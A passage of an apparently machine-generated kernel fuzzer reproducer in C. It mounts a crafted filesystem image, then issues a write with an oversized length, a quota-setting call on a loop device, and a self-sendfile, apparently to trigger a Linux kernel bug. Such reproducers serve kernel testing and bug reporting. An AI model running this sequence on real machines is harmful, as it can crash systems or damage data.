"\x00\x00\x00\x00\x00\x00\x00\x38\xb9\xfe\x0e\x00\x00\xff\xff\x97\x1b\xfb"
"\xf2",
1135);
syz_mount_image(/*fs=*/0x200000000b80, /*dir=*/0x200000000000, /*flags=*/0,
/*opts=*/0x200000000ac0, /*chdir=*/1, /*size=*/0x46f,
/*img=*/0x200000000540);
// syz_create_resource$binfmt arguments: [
// file: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// ]
// returns ptr_binfmt_file
memcpy((void*)0x200000000040, "./file1\000", 8);
res = -1;
res = syz_create_resource(/*file=*/0x200000000040);
if (res != -1)
r[0] = res;
// openat$binfmt arguments: [
// fd: const = 0xffffffffffffff9c (8 bytes)
// file: ptr_binfmt_file (resource)
// flags: const = 0x2 (4 bytes)
// mode: const = 0x0 (2 bytes)
// ]
// returns fd_binfmt
res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/r[0],
/*flags=*/2, /*mode=*/0);
if (res != -1)
r[1] = res;
// write arguments: [
// fd: fd (resource)
// buf: ptr[in, buffer] {
// buffer: {0a 38 16 46 c3 bd e5 04 cc 45 43 f0 1c eb ae 2e b4 38 4d 6a
// 23 36 4e 46 c3 0a bf 1b 5f 16 ea e0 e4 05 ab 25 6d 31 7c f8 30 ce a9
// fc 38 36 38 e6 81 f3 a4 56 47 64 6d fd 88 25 02 1a ce 67 93 02 ff 6f
// 54 40 a8 14 b6 c9 08 93 b1 5d 2b 84 27 8f de 8f 97 57 20 c3 d4 6c 32
// c3 2d 89 fe d8 f2 f2 79 50 8a 3e 90 c3 a7 16 53 b1 a0 38 4b 6a f5 4f
// aa 0d 42 bc 4d e0 cf ad 85 73 01 81 26 b6 9b 06 fc 05 dd 18 54 dc ba
// 70 d3 52 de b9 20 3f 25 19 18 f2 47 51 47 fe 52 56 fe f7 72 ee 5a 1d
// 96 2c 36 6a bf 0a b4 a9 c4 1b 8c 12 14 00 00 00 00 00 00} (length
// 0xb1)
// }
// count: len = 0xffffff22 (8 bytes)
// ]
memcpy(
(void*)0x200000000300,
"\x0a\x38\x16\x46\xc3\xbd\xe5\x04\xcc\x45\x43\xf0\x1c\xeb\xae\x2e\xb4\x38"
"\x4d\x6a\x23\x36\x4e\x46\xc3\x0a\xbf\x1b\x5f\x16\xea\xe0\xe4\x05\xab\x25"
"\x6d\x31\x7c\xf8\x30\xce\xa9\xfc\x38\x36\x38\xe6\x81\xf3\xa4\x56\x47\x64"
"\x6d\xfd\x88\x25\x02\x1a\xce\x67\x93\x02\xff\x6f\x54\x40\xa8\x14\xb6\xc9"
"\x08\x93\xb1\x5d\x2b\x84\x27\x8f\xde\x8f\x97\x57\x20\xc3\xd4\x6c\x32\xc3"
"\x2d\x89\xfe\xd8\xf2\xf2\x79\x50\x8a\x3e\x90\xc3\xa7\x16\x53\xb1\xa0\x38"
"\x4b\x6a\xf5\x4f\xaa\x0d\x42\xbc\x4d\xe0\xcf\xad\x85\x73\x01\x81\x26\xb6"
"\x9b\x06\xfc\x05\xdd\x18\x54\xdc\xba\x70\xd3\x52\xde\xb9\x20\x3f\x25\x19"
"\x18\xf2\x47\x51\x47\xfe\x52\x56\xfe\xf7\x72\xee\x5a\x1d\x96\x2c\x36\x6a"
"\xbf\x0a\xb4\xa9\xc4\x1b\x8c\x12\x14\x00\x00\x00\x00\x00\x00",
177);
syscall(__NR_write, /*fd=*/r[1], /*buf=*/0x200000000300ul,
/*count=*/0xffffff22ul);
// syz_create_resource$binfmt arguments: [
// file: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// ]
// returns ptr_binfmt_file
memcpy((void*)0x200000000040, "./file1\000", 8);
res = -1;
res = syz_create_resource(/*file=*/0x200000000040);
if (res != -1)
r[2] = res;
// quotactl$Q_SETQUOTA arguments: [
// cmd: quota_cmd_setquota = 0xffffffff80000801 (8 bytes)
// special: ptr[in, blockdev_filename] {
// union blockdev_filename {
// loop: loop_filename {
// prefix: buffer: {2f 64 65 76 2f 6c 6f 6f 70} (length 0x9)
// id: proc = 0x0 (1 bytes)
// z: const = 0x0 (1 bytes)
// }
// }
// }
// id: uid (resource)
// addr: nil
// ]
memcpy((void*)0x200000000040, "/dev/loop", 9);
*(uint8_t*)0x200000000049 = 0x30;
*(uint8_t*)0x20000000004a = 0;
syscall(__NR_quotactl, /*cmd=Q_SETQUOTA_GRP*/ 0xffffffff80000801ul,
/*special=*/0x200000000040ul, /*id=*/0, /*addr=*/0ul);
// openat$binfmt arguments: [
// fd: const = 0xffffffffffffff9c (8 bytes)
// file: ptr_binfmt_file (resource)
// flags: const = 0x42 (4 bytes)
// mode: const = 0x1ff (2 bytes)
// ]
// returns fd_binfmt
res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/r[2],
/*flags=*/0x42, /*mode=*/0x1ff);
if (res != -1)
r[3] = res;
// sendfile arguments: [
// fdout: fd (resource)
// fdin: fd (resource)
// off: ptr[inout, intptr] {
// intptr = 0x1 (8 bytes)
// }
// count: intptr = 0x80800 (8 bytes)
// ]
*(uint64_t*)0x2000000000c0 = 1;
syscall(__NR_sendfile, /*fdout=*/r[3], /*fdin=*/r[3],
/*off=*/0x2000000000c0ul, /*count=*/0x80800ul);
return 0;
}